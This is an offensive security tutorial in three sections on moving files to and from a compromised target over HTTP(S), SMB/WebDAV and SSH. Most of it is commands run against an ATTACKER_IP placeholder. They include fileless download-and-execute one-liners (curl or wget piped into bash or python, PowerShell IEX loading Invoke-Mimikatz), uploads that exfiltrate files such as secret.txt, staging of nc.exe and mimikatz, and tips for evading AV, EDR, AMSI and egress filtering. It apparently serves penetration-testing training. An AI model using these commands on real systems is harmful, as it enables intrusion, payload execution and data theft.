1 - HTTP File Transfer
Learn how to transfer files from and to a compromised target using HTTP.
The main advantage of using HTTP for file transfer is that it blends into regular network traffic well, especially if the our attacker machine is outside the network. However, we should also note that HTTP is a plaintext protocol. If in-transit encryption is needed, we can set up HTTPS.
In this article, we will be running an HTTP(s) server on the attacker machine, as this will make our file transfer operation look like regular web file download/upload.
Running HTTP Server
To create an HTTP server on the attacker machine, we can use Python’s http.server module. By default, it starts an HTTP server on TCP port 8000.
To specify a port other than 8000, we can simply append the port number to the command. If we wish to use port 80 or any other port lower than 1024, we need to provide elevated privileges.
sudo python -m http.server 80
The index page will be a directory listing of the server’s working directory.
╭─brian@A77ACk3r /tmp/http_demo
╰─$ ls -l
total 12
-rw-r--r-- 1 brian wheel 7 Jan 19 14:15 file1.txt
-rw-r--r-- 1 brian wheel 7 Jan 19 14:15 file2.txt
-rw-r--r-- 1 brian wheel 7 Jan 19 14:15 file3.txt
╭─brian@A77ACk3r /tmp/http_demo
╰─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
╭─brian@A77ACk3r ~
╰─$ curl localhost:8000
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="utf-8">
<style type="text/css">
:root {
color-scheme: light dark;
}
</style>
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="file1.txt">file1.txt</a></li>
<li><a href="file2.txt">file2.txt</a></li>
<li><a href="file3.txt">file3.txt</a></li>
</ul>
<hr>
</body>
</html>
╭─brian@A77ACk3r ~
╰─$ curl localhost:8000/file1.txt
File 1
By default, Python’s http.server module does not have file upload capabilities. If we wish to upload files to our attacker machine from the target, we can use uploadserver Python module instead, which can be installed via pip on Debian-based machines or the python-uploadserver AUR package for Arch Linux.
The command syntax of uploadserver is similar to http.server.
sudo python -m uploadserver 80
Running HTTPS Server
Python module uploadserver also provides HTTPS functionality. To set up an HTTPS server using this module, we have to first generate a self-signed TLS certificate using openssl.
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
For OPSEC considerations, put the certificate somewhere outside of the directory you wish to run the HTTP server.
╭─brian@A77ACk3r /tmp/http_demo
╰─$ mv server.pem ~/ssl_cert/server.pem
To launch uploadserver with HTTPS, use the --server-certificate argument to specify the path to the TLS certificate we just generated.
sudo python -m uploadserver 443 --server-certificate ~/ssl_cert/server.pem
HTTP File Transfer
Both Linux and Windows provides us utilities to transfer files via HTTP(s).
HTTP File Transfer on Linux
On Linux, Wget and cURL may be used to download files via HTTP(s).
cURL
cURL is a tool to make HTTP requests, including those that can be used to download files with -o option specifying output filepath.
curl http://<ATTACKER_IP>[:PORT]/file -o <OUTPUT_PATH>
If we do not wish to leave trace of our attack in the form of a disk on file, which can be picked up by AV or EDR, we can curl the script we wish to run and pipe it into the appropriate interpreter. The following example showcases a command to run a Bash script being ran filelessly:
curl http://<ATTACKER_IP>/LinEnum.sh | bash
We can also use curl to upload a file to the attacker machine . Make sure your HTTP server can handle file uploads. Multiple files can be specified
curl -X POST https://<ATTACKER_IP>/upload -F 'files=@<FILE_PATH>'
If you are running an HTTPS server with self-signed cert, use the --insecure option to tell curl to ignore it.
curl -X POST https://<ATTACKER_IP>/upload -F 'files=@<FILE_PATH>' --insecure
Wget
Wget is used mostly to download files over the web on command line.
wget http://<ATTACKER_IP>[:PORT]/file
By default, wget downloads the file to current directory. Use -O to specify alternative file output path. This might be useful if we only have a webshell or non-interactive command execution.
wget http://<ATTACKER_IP>[:PORT]/file -O <OUTPUT_PATH>
Similarly, wget can also be used to run scripts without the script written to disk:
wget -qO- http://<ATTACKER_IP>/helloworld.py | python3
HTTP File Download on Windows
There are multiple ways, using standalone programs, PowerShell methods or cmdlets, to download files over HTTP(s) on Windows.
certutil.exe
Certutil can be used to download arbitrary files and is often regarded by security professional as the Windows equivalent of Wget. However, due to its popularity, Antimalware Scan Interface (AMSI) currently detects this as malicious Certuil usage.
certutil.exe -verifyctl -split -f http://<ATTACKER_IP>/file
BITS
The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares.
bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
BITS can also be used with PowerShell syntax:
Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
PowerShell DownloadFile/DownloadFileAsync
PowerShell methods DownloadFile and DownloadFileAsync both belong to .NET class System.Net.WebClient. They perform similar functions.
The DownloadFile method will block until the file is completely downloaded, good for smaller files.
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
The DownloadFileAsync method will download the file in the background, good for large files.
(New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PowerShell IEX DownloadString
PowerShell Invoke-Expression cmdlet or alias IEX allows PowerShell scripts to be downloaded directly into memory, useful for fileless attacks against Windows:
IEX (New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP/Invoke-Mimikatz.ps1')
The IEX cmdlet also accepts pipelined input:
(New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP/Invoke-Mimikatz.ps1') | IEX
PowerShell Invoke-WebRequest
Invoke-WebRequest allows files to be downloaded like curl or wget on Linux, although it’s noticeably slower at downloading files.
Invoke-WebRequest "http://<ATTACKER_IP>[:PORT]/file" -OutFile <OUTPUT_PATH>
Alternatively, use the iwr alias:
iwr -uri "http://<ATTACKER_IP>[:PORT]/file" -OutFile <OUTPUT_PATH>
PowerShell Web Uploads
PowerShell does not have a direct cmdlet that allows us to upload files via HTTP, but Invoke-WebRequest and Invoke-RestMethod provides the building blocks for upload functionalities.
We can use PSUpload.ps1, which uses Invoke-RestMethod to perform the upload operation. The script accepts two parameters:
-File: used to specify the file path-Uri: the URL where the file will be uploaded.
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri "http://<ATTACKER_IP>/upload" -File <FILE_PATH>
2 - SMB File Transfer
Learn how to transfer files from and to a compromised target using SMB.
SMB is very ubiquitous in Windows-based internal network environments like an Active Directory network. As such, it also provides opportunities for attackers to exfiltrate files in and out of the network.
In this article, we will primarily discuss file download and upload methods for Windows targets. SMB file transfer on Linux targets can be achieved with smbclient if one is installed on the target machine.
SMB Server Setup
If we want to host an SMB server on the Linux attacker machine, we can use Impacket smbserver.py. Note that elevated privilege is needed to bind to port numbers less than 1024.
sudo smbserver.py share -smb2support /tmp/smbshare
SMB File Transfer
SMB File Download
From the Windows host, we can issue copy commands to download files from our SMB share.
C:\> copy \\<ATTACKER_IP>\share\nc.exe
1 file(s) copied.
Note that newer versions of Windows block unauthenticated SMB access by default. We can work around it by setting a username and password with our SMB server:
sudo smbserver.py share -smb2support /tmp/smbshare -user <USERNAME> -password <PASSWORD>
We now have to mount our share with net use before being able to transfer files.
C:\> net use n: \\<ATTACKER_IP>\share /user:<USERNAME> <PASSWORD>
The command completed successfully.
C:\> copy n:\nc.exe
1 file(s) copied.
SMB File Upload
Similarly, file upload from target to attacker machine can be done using the copy command.
C:\> net use n: \\<ATTACKER_IP>\share /user:<USERNAME> <PASSWORD>
The command completed successfully.
C:\> copy secret.txt n:\
1 file(s) copied.
C:\> dir n:\
Volume in drive N has no label.
Volume Serial Number is ABCD-EFAA
Directory of n:\
01/28/2026 02:21 PM 11 secret.txt
1 File(s) 11 bytes
0 Dir(s) 15,207,469,056 bytes free
WebDAV File Transfer
Many organizations may flag SMB traffic out of their internal network as suspicious or block them altogether. We can circumvent these retrictions using WebDAV, which is an extension of HTTP that enables a web server to behave like an SMB file server. This allows our SMB traffic to blend in with normal HTTP traffic, which is unlikely to get blocked in all but air-gapped networks.
To set up a WebDAV server on our Linux Attacker machine, we need two Python modules: wsgidav and cheroot. Below is the wsgidav command to setup a WebDAV share:
sudo wsgidav --host=0.0.0.0 --port=80 --root=<SHARE_PATH> --auth=anonymous
On our Windows host, we can connect to the WebDAV share by specifying the DavWWWRoot directory, which will allow us to access files in the root directory.
C:\> dir \\<ATTACKER_IP>\DavWWWRoot
Volume in drive \\<ATTACKER_IP>\DavWWWRoot has no label.
Volume Serial Number is 0000-0000
Directory of \\<ATTACKER_IP>\DavWWWRoot
01/28/2026 02:46 PM <DIR> .
01/28/2026 02:46 PM <DIR> ..
01/28/2026 02:46 PM <DIR> exploits
01/28/2026 02:21 PM 11 secret.txt
1 File(s) 11 bytes
3 Dir(s) 12,622,446,592 bytes free
To access a nested directory on the share, simply specify the name of the directory (e.g. exploits) in lieu of DavWWWRoot.
C:\> dir \\<ATTACKER_IP>\exploits
Volume in drive \\<ATTACKER_IP>\exploits has no label.
Volume Serial Number is 0000-0000
Directory of \\<ATTACKER_IP>\exploits
01/28/2026 02:46 PM <DIR> .
01/28/2026 02:46 PM <DIR> ..
01/28/2026 02:45 PM 10 exploit.ps1
1 File(s) 10 bytes
2 Dir(s) 12,623,360,000 bytes free
C:\> copy \\<ATTACKER_IP>\exploits\exploit.ps1
1 file(s) copied.
C:\> type exploit.ps1
PWN3D!!!!
Alternatively, WebDAV can also be mapped with a drive letter using net use.
PS C:\Users\Brian> net use W: \\<ATTACKER_IP>\DavWWWRoot /user:anonymous password
The command completed successfully.
PS C:\> dir W:\
Directory: W:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/28/2026 2:46 PM exploits
-a---- 1/28/2026 2:21 PM 11 secret.txt
Delete Drive Mapping
If you used net use to map your SMB or WebDAV share to a drive letter, unmap it before shutting the server down.
net use <DRIVE_LETTER> /delete
3 - SSH File Transfer
Learn how to transfer files from and to a compromised target using SSH.
The main advantage of file transfer using SSH is that files are encrypted in transit via SSH tunneling.
To transfer files via SSH, we use the scp utility, which allows files to be copied between two hosts through SSH tunneling.
SSH File Transfer (Connect to Target Server)
If we have SSH access on the target host, we can run the scp command on our attacker machine to transfer files.
Download Operation
To download a file from the target to our machine, we specify the remote path (user@host:<PATH>) as the copy source, and a local path as the destination.
scp <USER>@<TARGET_IP>:<REMOTE_PATH> <LOCAL_PATH>
scp can also authenticate to the target SSH server using public-key authentication. We use -i to specify path to the private key.
scp -i <PRIV_KEY_PATH> <USER>@<TARGET_IP>:<REMOTE_PATH> <LOCAL_PATH>
If the SSH server listens on a different port, we can use -P to specify port manually.
scp -P <PORT> <USER>@<TARGET_IP>:<REMOTE_PATH> <LOCAL_PATH>
Upload Operation
To upload a file from the attacker machine to the target, we specify the local file path as copy source and the remote path as the destination.
scp <LOCAL_PATH> <USER>@<TARGET_IP>:<REMOTE_PATH>
SSH File Transfer (Connect to Attacker Server)
If we cannot login via SSH on the target, or if SSH is not running at all (rarer on Unix-like hosts), we can run scp from the target and connect to an SSH server we host on the attacker machine.
To start SSH server on the attacker machine:
Note: The names for the SSH Server service may differ across distros. Some may call it ssh, sshd, or openssh. Check your distro documentation for details.
Download Operation
Since server now runs on attacker machine, this means file will be downloaded from the attacker machine to the target. Run the following command on the target:
scp <USER>@<TARGET_IP>:<REMOTE_PATH> <LOCAL_PATH>
Upload Operation
Since server now runs on attacker machine, this means file will be upload from the target to the attacker machine. Run the following command on the target:
scp <LOCAL_PATH> <USER>@<TARGET_IP>:<REMOTE_PATH>
Using SCP with Windows
If SSH is running on a Windows host, we can still use scp to transfer files. The only thing to note is that backslashes (\) are replaced with forward slashes (/) in the remote path.
scp mimikatz.exe Administrator@10.10.0.3:C:/Temp/